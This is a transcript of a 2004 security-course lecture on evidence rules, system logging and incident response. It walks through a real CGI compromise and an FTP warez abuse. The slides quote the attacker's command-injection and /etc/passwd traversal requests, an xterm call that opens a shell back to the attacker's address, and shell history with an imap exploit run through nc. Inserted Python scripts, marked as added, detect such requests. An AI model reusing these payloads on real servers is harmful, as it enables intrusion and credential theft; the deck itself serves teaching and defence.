CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management - PowerPoint PPT Presentation

Provided by: simsonlg
Slides: 73

Transcript and Presenter's Notes

1
CSCI E-170 November 30, 2004
Administrivia
Federal Rules of Evidence
Logging
Integrity Management
2
Administrivia
  • Project Proposals are due today
  • Who is in your group?
  • What are you doing?
  • Not graded
  • Quiz #2: You will be given 4 papers and expected
    to write a page on each.

3
Administrivia 2
  • Some students have not turned in any work to
    date.
  • Think about dropping the course.
  • Students who do not turn in a final project will
    fail.

4
Federal Rules of Evidence
  • 9 Articles
  • Many states follow FRE
  • Codifies common law
  • Why study them?

5
Article I Ground Rules
  • Rule 101 - Scope
  • Rule 1101 - Does not apply to preliminary
    questions of fact, grand jury, miscellaneous
    proceedings
  • Rule 102 - Purpose
  • Fairness
  • Eliminate unjustifiable expense and delay
  • Rule 103 - Rulings on Evidence
  • What to do when opposing parties disagree.

6
Article II JUDICIAL NOTICE
  • Every case involves the use of hundreds or
    thousands of non-evidence facts
  • When a witness says car, everyone assumes that
    the car is an automobile, not a railroad car,
    that it is self-propelled, and so on.

7
ARTICLE III PRESUMPTIONS IN CIVIL ACTIONS AND
PROCEEDINGS
  • Determines who has the burden of rebutting the
    evidence.
  • Presumption imposes on the party against whom it
    is directed the burden of going forward with
    evidence to rebut or meet the presumption

8
ARTICLE IV RELEVANCY AND ITS LIMITS
  • Relevant evidence is admissible
  • Irrelevant Evidence is inadmissible
  • Evidence that wastes time can be excluded
  • Character evidence of defendant not admissible to
    prove conduct (unless introduced by defendant)
  • Character evidence of victim introduced only in
    homicide case to rebut evidence that alleged
    victim was first aggressor
  • Rule 412 - rape shield law

9
ARTICLE V PRIVILEGES
  • may be interpreted by the courts of the United
    States in light of reason and experience

10
ARTICLE VI WITNESSES
  • Rule 601 Every person is competent to be a
    witness (except as otherwise provided)
  • Rule 602 Witness must have personal knowledge
  • Rule 605 Judge cannot testify as witness
  • Rule 606 Juror may not testify as witness
  • Rule 612 Adverse party is entitled access to
    writing used to refresh memory

11
ARTICLE VII OPINIONS AND EXPERT TESTIMONY
  • Rule 701 Lay witness may not testify based on
    scientific, technical, or other specialized
    knowledge
  • Rule 702 Experts must be qualified, use reliable
    principles and methods, and apply those
    standards to this case.
  • Rule 704 Experts may state an opinion on the
    ultimate issue, except for matters of mental
    state.

12
ARTICLE VIII HEARSAY
  • Rule 801 Hearsay is a statement, other than
    one made by the declarant while testifying at the
    trial or hearing, offered in evidence to prove
    the truth of the matter asserted.
  • Many, many exceptions to hearsay
  • 803(5) - Recorded Recollection
  • 803(6) - Records of regularly conducted activity
  • 803(7) Absence of entry in records kept in
    accordance with 803(6) to prove nonoccurrence or
    nonexistence

13
ARTICLE IX AUTHENTICATION AND IDENTIFICATION
  • Rule 901 Documents must be authenticated (many
    examples given)
  • Rule 902 Some documents are self-authenticating
    (computer records aren't)

14
ARTICLE X CONTENTS OF WRITINGS, RECORDINGS, AND
PHOTOGRAPHS
  • Rule 1002 Originals are required, except where
    duplicates may be admitted.
  • Rule 1003 Duplicates may be admitted unless
    genuine questions are raised about the
    authenticity or in unfair circumstances.
  • What is an original computer record?

15
ARTICLE XI MISCELLANEOUS RULES
  • Rule 1101 Applicability
  • Rule 1102 Amendments
  • Rule 1103 Title

16
Orin S. Kerr article
  • What's the point?
  • What are Records of regularly conducted
    activity?
  • Are computer records monolithic?
  • How do you authenticate computer records? How are
    they challenged?
  • When do the Hearsay rules apply?
  • What's the deal with postings from websites of
    white supremacist groups?
  • What about email in a harassment case?

17
What is a log?
  • Definition?
  • Unix vs. Windows?
  • Palm?

18
What gets logged?
19
What gets logged?
  • Logins / logouts
  • Privilege escalation
  • Security relevant events

20
What goes in a log?
21
Why keep logs?
22
Why look at logs? (Marcus)
  • Policy
  • Legality
  • Cost saving

23
Common mistakes (Marcus)
  • #1 Collecting it and not looking at it (might
    as well log to /dev/null)
  • #2 Watching logs from perimeter systems while
    ignoring internal systems
  • #3 Designing your log architecture before you
    decide what you're going to collect
  • #4 Only looking for what you know you want to
    find instead of just looking to see what you find.

24
Common Mistakes 2
  • #5 Proceeding without doing envelope estimates
    of load.
  • #6 Thinking your logs are evidence if you don't
    collect them right
  • #7 Forgetting that this is just a data
    management problem
  • #8 Drinking the XML Kool-Aid

25
How are things logged?
  • f = fopen(logfile, "w")
  • syslog()
  • logger

26
Web Logs
  • access_log vs. error_log
  • 65.54.188.137 - - [30/Nov/2004:00:16:54 -0500]
    "GET /photos/security/printTifs/medRes/onGray/platePlusStickerGreyMR.tif HTTP/1.0"
    200 6017064 "-" "msnbot/0.3 (http://search.msn.com/msnbot.htm)"
  • 66.35.208.62 - - [30/Nov/2004:00:17:38 -0500]
    "GET /blog/index.rdf HTTP/1.1" 200 8882 "-"
    "Jakarta Commons-HttpClient/2.0.1"

27
Web logs: grep 'q=' www/simson.net/logs/access_log | sed 's/.*q=//' | awk '{print $1}' | head
  • smart+identity+card+client+disney-go&start=10"
  • simson&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N"
  • backing+up+raid+drives&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N"
  • lzhuf&hl=en&lr=&ie=UTF-8&start=40&sa=N"
  • brown+simson&FORM=SMCRT"
  • %22home+wiring%22&_sb_lang=en"
  • %22wireless+photo+album%22&lr="
  • lzhuf+public+domain&hl=en&lr=&ie=UTF-8&start=10&sa=N"
  • simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="
  • simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="

28
Mail Logs
  • 2004-11-13 23:51:35 H=ns.simson.net (64.7.15.234)
    [64.7.15.234] F=<truxnezze@swissonline.ch>
    rejected RCPT <domideltana@ex.com>: Unknown user
  • 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234)
    [64.7.15.234] F=<truxnezze@swissonline.ch>
    rejected RCPT <domidrumsaloe@ex.com>: Unknown user
  • 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234)
    [64.7.15.234] F=<truxnezze@swissonline.ch>
    rejected RCPT <domie.douglass@ex.com>: Unknown user
  • 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234)
    [64.7.15.234] F=<truxnezze@swissonline.ch>
    rejected RCPT <domielihli@ex.com>: Unknown user
  • 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234)
    [64.7.15.234] F=<truxnezze@swissonline.ch>
    rejected RCPT <domierdoc14@ex.com>: Unknown user
  • 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234)
    [64.7.15.234] F=<truxnezze@swissonline.ch>
    rejected RCPT <domifdwyer@ex.com>: Unknown user
  • 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234)
    [64.7.15.234] F=<truxnezze@swissonline.ch>
    rejected RCPT <domil.cpwhiz40@ex.com>: Unknown user
  • 2004-11-13 23:52:01 H=ns.simson.net
    (cable-67-97-53-251.dct.al.charter.com)
    [64.7.15.234] F=<mvceubrfvsrm@charter.com>
    rejected RCPT <gayda@ex.com>: Unknown user
  • 2004-11-13 23:52:01 H=ns.simson.net
    (cable-67-97-53-251.dct.al.charter.com)
    [64.7.15.234] F=<mvceubrfvsrm@charter.com>
    rejected RCPT <jensen@ex.com>: Unknown user

29
Radius Logs
  • Sun Mar 18 04:35:24 2001
    Acct-Session-Id = "00000000"
    NAS-IP-Address = 192.168.1.5
    Acct-Status-Type = Stop
    Acct-Session-Time = 0
    Acct-Delay-Time = 0
    Timestamp = 984918924
    Request-Authenticator = Verified
  • Sun Mar 18 04:35:24 2001
    Acct-Session-Id = "06000004"
    User-Name = "admin"
    NAS-IP-Address = 192.168.1.5
    Acct-Status-Type = Start
    Acct-Authentic = Local
    Service-Type = Administrative-User
    Login-Service = Telnet
    Login-IP-Host = 192.168.1.1
    Acct-Delay-Time = 75
    Timestamp = 984918924
    Request-Authenticator = Verified

30
Security Incidents: Strange Authentication
Attempts
  • I woke up to find these entries in my RADIUS log
    file:
    Tue Mar 30 10:26:00 2004 : Auth: Login incorrect: config/system (from nas xxxx/S99)
    Tue Mar 30 10:26:00 2004 : Auth: Login incorrect: config/password admin (from nas xxxx/S99)
    Tue Mar 30 10:26:00 2004 : Auth: Login incorrect: config/13370n3z (from nas xxxx/S99)
    Tue Mar 30 10:26:01 2004 : Auth: Login incorrect: password/fawkoffsz (from nas xxxx/S99)
    Tue Mar 30 10:26:01 2004 : Auth: Login incorrect: password/save (from nas xxxx/S99)

http://seclists.org/lists/incidents/2004/Mar/0116.html
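The entries above are the classic signature of password guessing against a NAS: several "Login incorrect" lines for the same NAS within a second or two, cycling through usernames. The following is an added example (not from the course slides or the quoted post) that detects such bursts with a sliding window; the line layout, with the ":" separators restored, and the "user/password" reading of the credential field are assumptions from the excerpt, and the names and the extra sixth line are mine.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed line layout, reconstructed from the excerpt above:
#   Tue Mar 30 10:26:00 2004 : Auth: Login incorrect: user/password (from nas xxxx/S99)
FAILURE_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) : Auth: Login incorrect: "
    r"(?P<user>[^/ ]+)/(?P<password>.*?) \(from nas (?P<nas>\S+)\)$"
)

# Constructed sample: the five entries from the post plus one stray failure an
# hour later from a different NAS that should not trip the alarm.
SAMPLE_LOG = [
    "Tue Mar 30 10:26:00 2004 : Auth: Login incorrect: config/system (from nas xxxx/S99)",
    "Tue Mar 30 10:26:00 2004 : Auth: Login incorrect: config/password admin (from nas xxxx/S99)",
    "Tue Mar 30 10:26:00 2004 : Auth: Login incorrect: config/13370n3z (from nas xxxx/S99)",
    "Tue Mar 30 10:26:01 2004 : Auth: Login incorrect: password/fawkoffsz (from nas xxxx/S99)",
    "Tue Mar 30 10:26:01 2004 : Auth: Login incorrect: password/save (from nas xxxx/S99)",
    "Tue Mar 30 11:30:15 2004 : Auth: Login incorrect: admin/typo (from nas yyyy/S1)",
]


def parse_failure(line):
    """(timestamp, user, nas) for a 'Login incorrect' line, else None."""
    m = FAILURE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("nas")


def find_guessing(lines, window_seconds=60, threshold=3):
    """Per NAS, the peak number of failures inside any window_seconds span;
    NASes at or above threshold are reported with the usernames tried."""
    by_nas = defaultdict(list)
    for line in lines:
        rec = parse_failure(line)
        if rec is not None:
            by_nas[rec[2]].append(rec)
    alerts = {}
    for nas, recs in by_nas.items():
        recs.sort()                      # log order is not guaranteed
        recent = deque()                 # timestamps inside the current window
        peak = 0
        for ts, _user, _nas in recs:
            recent.append(ts)
            while (ts - recent[0]).total_seconds() > window_seconds:
                recent.popleft()
            peak = max(peak, len(recent))
        if peak >= threshold:
            alerts[nas] = {"peak": peak, "total": len(recs),
                           "users": sorted({r[1] for r in recs})}
    return alerts
```

Note that this log stores the guessed password next to the username, so the log file itself needs the same protection as a credential store.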
31
Log architectures
  • UDP log issues
  • Windows

32
Logging on Unix
  • /etc/syslog.conf
  • /etc/newsyslog.conf
  • Grep
  • swatch

33
Logging on Windows
  • Event Viewer
  • Local security settings

34
Log hosts Aggregation
35
Can you trust these logs?
36
October 7th, 1997
  • 6:00pm
  • Arrive hotel in New York City.
  • Phone system does not support my modem.
  • Cell phone reception is terrible.
  • 8:45pm
  • Phone call from Eric Bates.
  • I think that we have a visitor.

37
Wed October 7th, 1997
  • User http is logged in on ttyp0 and idle for one
    day
  • bash-2.02$ w
  • 8:57PM up 27 days, 14:19, 5 users, load
    averages: 0.28, 0.33, 0.35
  • USER TTY FROM LOGIN@ IDLE WHAT
  • http p0 KRLDB110-06.spli Tue02AM 1days
    /bin/sh
  • simsong p1 asy12.vineyard.n 8:42PM 15 -tcsh
    (tcsh)
  • ericx p2 mac-ewb.vineyard 8:46PM 0
    script
  • ericx p3 mac-ewb.vineyard 8:46PM 11 top
  • ericx p4 mac-ewb.vineyard 8:53PM 1 sleep
    5
  • bash-2.02$
  • (Other employees had seen this and ignored it!)

38
First step: Document the machine
  • script(1) to create a transcript
  • ps: process list
  • netstat -a: open network connections
  • (lsof): open files
  • grep krldb access_log: likely avenue of attack
  • Goals:
  • Don't alarm intruder.
  • Find mechanism of access
  • Find out what he/she did.
  • Plug the holes.

39
ps - processes
  • Attacker only had two processes
  • /bin/sh on /dev/ttyp0 (2 copies)
  • PID 18671 and 26225
  • Idle since 2AM the previous day.
  • walden 336 % grep p0 plist
  • http 18671 0.0 0.1 244 276 p0 Is
    Tue02AM 0:02.23 /bin/sh
  • http 26225 0.0 0.1 236 276 p0 I
    Tue04AM 0:00.07 /bin/sh
  • walden 337 %

40
netstat - network connections
  • w gave incomplete hostname
  • KRLDB110-06.spli
  • netstat revealed one connection -- x11!
  • bash-2.02$ netstat -a
  • Active Internet connections (including servers)
  • Proto Recv-Q Send-Q Local Address
    Foreign Address (state)
  • . . .
  • tcp 0 0 APACHE.VINEYARD..3098
    KRLDB110-06.spli.X11 ESTABLISHED
  • Use netstat -n to get the IP address, from which you
    can get the full DNS name.

41
access_log - showed attack
  • grep krldb /usr/local/apache/logs/access_log
  • krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48
    -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa
    HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible;
    MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
  • krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50
    -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa
    HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible;
    MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
  • krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52
    -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd
    HTTP/1.0" 404 - "-"
    "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"
    "/htdocs/biz/captiva"

42
Attacker GETs
  • GET /cgi-bin/phf?Qname=me%0als%20-lFa
  • GET /cgi-bin/faxsurvey?ls%20-lFa
  • GET /cgi-bin/view-source?../../../../../../../../etc/passwd
  • GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd
  • GET /cgi-bin/campas?%0als%20-lFa
  • GET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=Download
  • GET /cgi-bin/php.cgi?/etc/passwd
  • GET /cgi-bin/faxsurvey?ls%20-lFa
  • GET /cgi-bin/faxsurvey?uname%20-a
  • GET /cgi-bin/faxsurvey?id
  • GET /cgi-bin/faxsurvey?cat%20/etc/passwd
  • GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/
  • GET /cgi-bin/faxsurvey?id
  • GET /cgi-bin/faxsurvey?pwd
  • GET /cgi-bin/faxsurvey?/bin/pwd
  • GET /cgi-bin/faxsurvey?ls%20-lFa
  • GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/
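The grep on the access_log slide found the attack because the hostname was already known. As an added example (not code from the course), the block below parses Apache combined-format lines like those on the Web Logs slide and flags the request shapes seen in this incident: hits on the CGI scripts named above, %0a or shell separators in the query, ../ traversal, and requests for /etc/passwd. The constructed sample re-types one msnbot hit and three of the attacker's requests from the slides; all function and constant names are mine.

```python
import re
from urllib.parse import unquote

# Apache "combined" layout as on the Web Logs and access_log slides:
#   host ident user [timestamp] "request" status bytes "referer" "user-agent"
# A site-specific trailing field (the document root) is tolerated.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# CGI scripts named on the attacker-GETs slide; 1998-era versions passed
# query strings to a shell or to open() unchecked.
VULNERABLE_CGI = ("phf", "faxsurvey", "view-source", "htmlscript", "campas", "handler", "php.cgi")
SHELL_META = re.compile(r"[\n;|`$]")  # %0a decodes to "\n": the phf trick

# Constructed sample: the msnbot hit from the Web Logs slide plus three of the
# attacker's requests from the access_log slide, as valid combined-format lines.
SAMPLE_LINES = [
    '65.54.188.137 - - [30/Nov/2004:00:16:54 -0500] "GET /photos/security/'
    'printTifs/medRes/onGray/platePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 '
    '"-" "msnbot/0.3 (http://search.msn.com/msnbot.htm)"',
    'krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/'
    'phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; '
    'MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"',
    'krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/'
    'faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; '
    'MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"',
    'krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/'
    'view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" '
    '"Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"',
]

def parse_combined(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0]
    rec["path"] = parts[1] if len(parts) > 1 else ""
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])  # "-" = no body
    return rec

def suspicious_reasons(path):
    """Why a request path looks like CGI abuse; an empty list means no flag."""
    script, _, query = path.partition("?")
    decoded = unquote(query)  # judge the decoded form, not the raw one
    reasons = []
    if script.startswith("/cgi-bin/") and any(n in script for n in VULNERABLE_CGI):
        reasons.append("request to known-vulnerable cgi script")
    if "../" in decoded:
        reasons.append("path traversal")
    if "/etc/passwd" in decoded:
        reasons.append("password file requested")
    if SHELL_META.search(decoded):
        reasons.append("shell metacharacter in query")
    return reasons

def scan(lines):
    """(host, path, status, reasons) for every line that raises a flag."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        reasons = suspicious_reasons(rec["path"])
        if reasons:
            hits.append((rec["host"], rec["path"], rec["status"], reasons))
    return hits
```

The status codes matter when reading the hits: the phf and view-source probes returned 404, while the faxsurvey request returned 200 with a 5469-byte body, which is the directory listing the command produced.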

43
Facts so far
  • It looks like the faxsurvey program allowed
    attacker to run arbitrary programs.
  • No evidence that he ran xterm --- except for the
    X11 connection back to his machine.
  • We don't know what he did or what else he knows.

44
Action plan
  • Add filter to router to block all access from
    splitrock (his ISP).
  • STOP his processes and gcore them to get command
    history.
  • kill -STOP PIDs
  • gcore -c file pid
  • strings file
  • Rename/remove the faxsurvey program (part of
    hylafax system).

45
Selected Environment variables from /bin/sh #1
  • GATEWAY_INTERFACE=CGI/1.1
  • REMOTE_HOST=krldb110-06.splitrock.net
  • REMOTE_ADDR=209.156.113.121
  • DOCUMENT_ROOT=/htdocs/biz/captiva
  • REMOTE_PORT=4801
  • SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
  • LOGNAME=http
  • REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
  • DISPLAY=209.156.113.121:0.0
  • SERVER_PORT=80
  • SCRIPT_NAME=/cgi-bin/faxsurvey

46
History from /bin/sh #1
  • st2.c
  • cron.c
  • cxterm.c
  • x2.c
  • qpush.c
  • cat t.c
  • cat .c
  • cat s.c
  • gc c
  • ls -lFa
  • ./s -v c2
  • ./s p0
  • ls -lFa /
  • cat .s
  • ls -lFa
  • cat /w
  • ls -lFa /
  • cat .s

  • .s: not found
  • gcc -o s steal.c
  • ls -lFa
  • .c
  • gcc -o s s.c
  • ftp 209.156.113.121
  • gcc -o s st2.c
  • ./s console
  • t
  • .s
  • .121
  • qpush.c ppp.c t2.c cron.c cxterm.c tcsh x2.c
    README README.debian qpush qpush.c qpush.c.old
  • gf: not found
  • /tmp
  • mfs28
  • /bin/sh

Looks like the attacker was trying to get some sort of
root-stealing exploit for Linux (or Debian Linux)
to work on the machine.
47
Selected history from /bin/sh #2
  • /bin/sh
  • /bin/sh
  • /etc/inetd.conf
  • qpush.c
  • /usr/bin/gcc
  • n/gcc
  • ./cc
  • expr
  • done
  • /bin/sh
  • inetd.conf
  • t) telnet 127.1 143
  • cd /etc
  • cat .s
  • which pwd
  • ls -lFa
  • expr L 1
  • ls -lFa
  • ./cc -10

Attacker sees that we are running imap
48
Selected history from /bin/sh #2
  • ./cc
  • /tmp/.s
  • /tmp
  • cd /tmp
  • cd .s
  • L100
  • cd .s
  • L-100
  • ls -lFa
  • cd /tmp
  • /bin/sh
  • ./q 127.1
  • load
  • /bins
  • _127.1
  • _/bins
  • ./cc
  • ./cc -92
  • ./cc -100

Attempts to exploit imap vulnerability
49
Selected history from /bin/sh #2
  • cat .s
  • export L
  • _.s
  • cat /etc/passwd | grep "root"
  • DISPLAY=209.156.113.121:0.0 -rvgdsg
  • DISPLAY=209.156.113.121:0.0
  • cat /etc/passwd | Grep "http"
  • cat /etc/passwd | grep "http"
  • cat /etc/passwd | grep "www"
  • while
  • done
  • 2 L
  • echo L
  • (./i 403 0xefbfd5e8 100; cat) | nc 127.1 143
  • cx L
  • L 1
  • (./i 403 0xefbfd5e8 100; cat) | telnet 127.1 143
  • echo
  • ./cc L

Searching for accounts and passwords
Tries again for imap
50
Selected history from /bin/sh #2
  • uname
  • ftp 209.156.113.121
  • mv pp.c p.c
  • ls -lFa mas
  • ls -lFa /etc | grep "mas"
  • cat master.passwd
  • telnet 127.1 25
  • locate modstat
  • which modstat
  • ls -lFa /usr/bin/mo
  • locate modstate
  • locate
  • ico s.c
  • locate modload
  • grep
  • ftp wildsau.idv.uni-lki
  • i-lki
  • cat /etc/inetd.conf
  • ./q -0 127.1

Tries for shadow password file
Tries again for sendmail
Tries for linux kernel module loader
And so on
51
Epilogue
  • We spoke with Splitrock
  • They didn't seem to care (Splitrock is a Prodigy
    dialup port in Texas.)
  • Eventually we were forced to lower the block.
  • FBI didn't care
  • This guy is clearly good
  • But we didn't have more than $8,000 in damages.
  • Vulnerability in faxsurvey had been reported
    July 29, 1998
  • nearly three months before incident!

52
BUGTRAQ Report
  • Date: Tue, 4 Aug 1998 07:41:24 -0700
  • Reply-To: dod@muenster.net
  • From: Tom <dod@MUENSTER.NET>
  • Subject: remote exploit in faxsurvey
    cgi-script
  • Hi!
  • There exists a bug in the 'faxsurvey' CGI-Script,
    which allows an attacker to
    execute any command s/he wants with the
    permissions of the HTTP-Server.
  • All the attacker has to do is type
    "http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"
    in his favorite Web-Browser to get a copy of your
    Password-File.
  • All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think
    also older ones) with the
    HylaFAX package installed are vulnerable to this
    attack.
  • AFAIK the problem exists in the call of 'eval'.

53
Epilogue 2
  • Follow security advisories.
  • Hard to do.
  • Don't let http
  • run gcc
  • read /usr/include

54
Detecting attacks with MRTG
  • Developed by
  • Tobias Oetiker <oetiker@ee.ethz.ch>
  • Dave Rand <dlr@bungi.com>
  • Designed to graph bandwidth of connections
  • Useful for graphing any value that changes over
    time.

55
Typical MRTG uses
  • T1 utilization
  • Dialup utilization



56
More MRTG uses
  • CPU utilization
  • GIF response time



57
MRTG shows changes over time
  • Hourly
  • Daily
  • Weekly
  • Monthly

58
May 19, 1998
  • 10:00 am
  • Meeting in Washington DC at the FBI.
  • 3:30pm
  • Get on train from Washington -> Boston (8 hour
    train ride - good chance to relax.)
  • 4:30pm
  • Call on cell phone from Aaron

59
Things are acting strange
  • Single server
  • WWW, POP, IMAP, etc.
  • CGI scripts terminating abnormally.
  • POP server sometimes disconnecting before e-mail
    is downloaded.
  • Finger doesn't work quite right.
  • Rest of Internet seems normal.

60
What's wrong?
  • No clue
  • Reboot the computer!
  • Problem goes away for 30 minutes, then comes back

61
Process list looks normal
  • USER PID %CPU %MEM VSZ RSS TT STAT
    STARTED TIME COMMAND
  • simsong 1770 86.4 2.0 5184 5212 p3 R
    5:34PM 4:47.73 /usr/local/bin/perl
    /usr/local/bin/report.www -v (report.www)
  • root 24659 31.4 0.0 0 0 ?? Z
    4:19PM 0:00.00 (admin_server)
  • root 2345 2.0 0.1 220 284 ?? S
    31Dec69 0:00.02 (ping)
  • root 1406 0.0 0.0 0 0 ?? Z
    5:32PM 0:00.00 (junkbuster)
  • root 0 0.0 0.0 0 0 ?? DLs
    Mon01PM 0:00.30 (swapper)
  • root 1 0.0 0.1 148 288 ?? Ss
    Mon01PM 0:01.63 /sbin/init
  • root 2 0.0 0.0 0 12 ?? DL
    Mon01PM 0:00.01 (pagedaemon)
  • root 15 0.0 0.0 68 64 ?? Is
    Mon01PM 0:00.00 asyncd 2
  • root 17 0.0 0.0 68 64 ?? Is
    Mon01PM 0:00.02 asyncd 2
  • root 26 0.0 0.8 748 2008 ?? Ss
    Mon01PM 0:00.67 mfs -o rw -s 40960 /dev/sd0b
    /tmp (mount_mfs)
  • root 51 0.0 0.1 268 296 ?? Ss
    Mon01PM 0:02.92 gettyd -s
  • root 62 0.0 0.1 160 340 ?? Ss
    Mon01PM 1:19.11 syslogd
  • daemon 65 0.0 0.1 112 184 ?? Ss
    Mon01PM 0:01.36 portmap
  • root 72 0.0 0.1 216 300 ?? Ss
    Mon01PM 0:01.34 mountd
  • root 74 0.0 0.1 144 288 ?? Is
    Mon01PM 0:00.01 nfsd-master (nfsd)
  • root 76 0.0 0.0 76 100 ?? I
    Mon01PM 0:00.00 nfsd-server (nfsd)
  • root 77 0.0 0.0 76 100 ?? I
    Mon01PM 0:00.04 nfsd-server (nfsd)
  • root 78 0.0 0.0 76 100 ?? I
    Mon01PM 0:00.00 nfsd-server (nfsd)

62
MRTG reveals a problem
  • Something is eating a lot of outgoing bandwidth
  • BLUE is transmitted data
  • GREEN is received data

63
Process list shows a problem far down from the
top
  • ftp 1471 0.0 0.2 740 496 ?? I
    12:28PM 0:13.88 ds9.kulnet.kuleuven.ac.be
    anonymous/mailtothedude@iname.com RETR
    pwa98cbl.zip\r\n (ftpd)
  • ftp 1750 0.0 0.2 752 504 ?? S
    12:32PM 0:12.79 ds9.kulnet.kuleuven.ac.be
    anonymous/guest@ RETR pwa98cbj.zip\r\n (ftpd)
  • ftp 6982 0.0 0.2 288 480 ?? S
    1:20PM 0:17.21 142.194.48.68
    anonymous/getright@ RETR /simson/open/nothing_here/this_site_sucks/pwa98cbg.zip\r\n (ftpd)
  • ftp 10062 0.0 0.2 288 480 ?? S
    1:53PM 0:00.27 cmodem85.lancite.net
    anonymous/getright@ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbf.zip\r\n (ftpd)
  • ftp 10088 0.0 0.2 288 480 ?? S
    1:54PM 0:00.27 cmodem85.lancite.net
    anonymous/getright@ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbe.zip\r\n (ftpd)
  • ftp 10125 0.0 0.2 288 480 ?? S
    1:54PM 0:00.28 cmodem85.lancite.net
    anonymous/getright@ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbd.zip\r\n (ftpd)
  • ftp 10251 0.0 0.2 288 480 ?? S
    1:55PM 0:00.28 cmodem85.lancite.net
    anonymous/getright@ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbc.zip\r\n (ftpd)
  • Total simultaneous FTP transfers: 106

64
Netstat reveals further information
  • walden 424 % more netstat-list
  • Active Internet connections (including servers)
  • Proto Recv-Q Send-Q Local Address
    Foreign Address (state)
  • tcp 0 0 VINEYARD.NET.http
    a2p09.capcon.net.1203 SYN_RCVD
  • tcp 0 0 VINEYARD.NET.http
    DSY4.VINEYARD.NE.1406 SYN_RCVD
  • tcp 0 0 VINEYARD.NET.pop
    ASY5.VINEYARD.NE.2117 ESTABLISHED
  • tcp 0 1513 VINEYARD.NET.http
    207.112.204.161.1570 FIN_WAIT_1
  • tcp 0 8500 VINEYARD.NET.http
    srry01m05-128.bc.1505 ESTABLISHED
  • tcp 0 7168 VINEYARD.NET.http
    hd62-160.hil.com.2033 ESTABLISHED
  • tcp 0 8192 VINEYARD.NET.http
    208.232.119.2.4125 ESTABLISHED
  • tcp 0 7552 VINEYARD.NET.20
    hades.osc.epsilo.2943 ESTABLISHED
  • tcp 0 6952 VINEYARD.NET.http
    ww-tl01.proxy.ao.37672 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.ftp
    dns1.bit-net.com.2268 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.http
    cs206-32.student.1068 FIN_WAIT_2
  • tcp 0 0 VINEYARD.NET.ftp
    spc-isp-mon-uas-.1037 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.ftp
    kenny26.zip.com..1033 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.http
    cs206-32.student.1067 FIN_WAIT_2
  • tcp 0 0 VINEYARD.NET.ftp
    sladl3p24.ozemai.1676 ESTABLISHED
  • tcp 0 8760 VINEYARD.NET.pop
    ASY10.VINEYARD.N.1043 ESTABLISHED

65
We've been warezed!
  • ftp://vineyard.net/simson/open
  • World-writable FTP directory.
  • Two directories were created in open
  • Three spaces
  • nothing_here

66
File list
  • ./open/ /
  • ./open/ /calibreX/
  • ./open/ /calibreX/Win98.Final-PWA/
  • ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
